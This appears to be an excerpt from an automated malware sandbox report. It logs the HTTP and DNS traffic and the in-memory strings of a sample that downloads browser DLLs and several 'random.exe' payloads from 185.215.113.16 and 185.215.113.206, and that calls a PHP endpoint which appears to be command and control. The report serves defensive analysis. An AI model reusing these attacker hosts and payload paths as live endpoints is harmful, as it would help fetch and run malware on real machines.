Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 12:24:50 GMTIf-None-Match: "67334912-1b3400"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: uu_host_config.9.dr, 000003.log.9.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: uu_host_config.9.dr, 000003.log.9.dr String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.ldb.9.dr String found in binary or memory: "www.youtube.com": "{: equals www.youtube.com (Youtube)
Source: 000003.ldb.9.dr String found in binary or memory: "www.youtube.com": "{:1 equals www.youtube.com (Youtube)
Source: uu_host_config.9.dr, 000003.log.9.dr String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: browser.events.data.msn.com
Source: global traffic DNS traffic detected: DNS query: r.msftstatic.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: file.exe, 00000000.00000002.2651081416.0000000023661000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exex
Source: file.exe, 00000000.00000002.2619339487.0000000000665000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2625469567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001D.00000002.3017859957.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001D.00000002.3017859957.0000000001235000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/$
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/4
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllV
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllz
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllH
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllL
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllR
Source: file.exe, 00000000.00000002.2625469567.0000000001383000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.0000000001222000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/I
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/a
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.000000000144D000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001D.00000002.3017859957.0000000001222000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/c
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/u
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2%
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.000000000121D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php;
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpM
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.000000000121D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_
Source: file.exe, 00000000.00000002.2625469567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpeT
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.000000000121D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
Source: 80b5f835af.exe, 0000001D.00000002.3017859957.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phphQ2v
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.000000000144D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpi
Source: file.exe, 00000000.00000002.2619339487.0000000000665000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz%
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~wg$
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/k
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/l
Source: file.exe, 00000000.00000002.2625469567.000000000130A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/r
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.000000000144D000.00000004.00000020.00020000.00000000.sdmp, 80b5f835af.exe, 0000001D.00000002.3017859957.0000000001222000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 80b5f835af.exe, 0000001A.00000002.2874044959.00000000013EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206S_
Source: file.exe, 00000000.00000002.2619339487.0000000000665000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206ngineer
Source: 80b5f835af.exe, 0000001F.00000002.3094796057.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206y
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_465.5.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2655139395.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2648044779.000000001D696000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2654880880.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: JEHIJJKE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_467.5.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_467.5.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_467.5.dr, chromecache_465.5.dr String found in binary or memory: https://apis.google.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://assets.msn.cn/resolver/
Source: 4163abde-9904-4e58-b214-c613a4eb5ed6.tmp.10.dr, 9ea67364-8430-4fd4-89e9-4f7b5d777328.tmp.10.dr String found in binary or memory: https://assets.msn.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://assets.msn.com/resolver/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://bit.ly/wb-precache
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp, BFHDHJKKJDHJJJJKEGHI.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp, BFHDHJKKJDHJJJJKEGHI.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://browser.events.data.msn.com/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://c.msn.com/
Source: JEHIJJKE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2625469567.0000000001327000.00000004.00000020.00020000.00000000.sdmp, JEHIJJKE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2625469567.0000000001327000.00000004.00000020.00020000.00000000.sdmp, JEHIJJKE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json.9.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.9.dr String found in binary or memory: https://chromewebstore.google.com/
Source: 6322027c-749c-41a5-82e3-b194ec7b8ece.tmp.10.dr, 4163abde-9904-4e58-b214-c613a4eb5ed6.tmp.10.dr, 9ea67364-8430-4fd4-89e9-4f7b5d777328.tmp.10.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json0.9.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 6322027c-749c-41a5-82e3-b194ec7b8ece.tmp.10.dr, 4163abde-9904-4e58-b214-c613a4eb5ed6.tmp.10.dr, 9ea67364-8430-4fd4-89e9-4f7b5d777328.tmp.10.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_467.5.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_467.5.dr String found in binary or memory: https://content.googleapis.com
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp, BFHDHJKKJDHJJJJKEGHI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2651081416.00000000236C3000.00000004.00000020.00020000.00000000.sdmp, BFHDHJKKJDHJJJJKEGHI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: manifest.json0.9.dr String found in binary or memory: https://docs.google.com/
Source: chromecache_467.5.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json0.9.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-5.corp.google.com/
